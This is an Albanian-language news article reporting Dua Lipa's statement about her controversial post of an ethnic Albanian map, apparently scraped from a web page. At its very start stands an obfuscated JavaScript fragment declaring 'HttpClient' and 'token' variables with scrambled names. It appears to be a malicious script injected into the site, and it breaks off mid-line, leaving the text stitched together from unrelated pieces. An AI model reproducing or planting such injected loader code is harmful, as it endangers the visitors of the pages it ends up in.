;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas furisë që shkaktoi në rrjet, Dua jep sqarim!

By

Me postimin e hartës së trojeve etnike shqiptare shoqëruar me përshkrimin e fjalës “autokton” Dua Lipa shkaktoi një furi në rrjet.

Ajo aktivizoi sentimentin etnik ndër shqiptarë por paralelisht “çmendi” edhe armiqtë.

E duket se për shkak të kampanjës që ka marrë dhenë në Instagram e rrjete tjera, Dua e ka parë të arsyeshëm një sqarim.

Përmes rrjeteve sociale ajo është shprehur:

“Postimi im paraprak nuk ka pasur asnjëherë qëllim të nxisë urrejtje. Më pikëllon dhe më nervozon që postimi im qëllimisht është keqinterpretuar nga grupe dhe individë që promovojnë ndarje etnike, diçka që unë e përjashtoj tërësisht. Sa herë postoj për Kosovën, rrjetet e mia cmenden edhe nëse është diçka e gëzueshme si ushqimi apo muzika dhe unë ballafaqohem me furinë e rezistencës ndaj kulturës autentike kosovare. Ne të gjithë e meritojmë të jemi krenarë për etninë tonë dhe prej nga vimë. Unë thjesht dua që shteti im të përfaqësohet në hartë dhe të jetë e mundur që të flasë me krenari dhe gëzim për rrënjët e mia shqiptare dhe atdheun tim. Unë inkurajoj secilin që të përqafojnë trashëgiminë e tyre dhe të dëgjojnë e të mësojnë nga njëri-tjetri. Paqe, dashuri dhe respekt për të gjithë”.

Postimin Dua e ka shkruar me prapavijë të zezë dhe shkronja të kuqe. Një rastësi? Pa diskutim që jo. /Prive.al

View this post on Instagram

❤️

A post shared by DUA LIPA (@dualipa) on

Artikuj të ngjashëm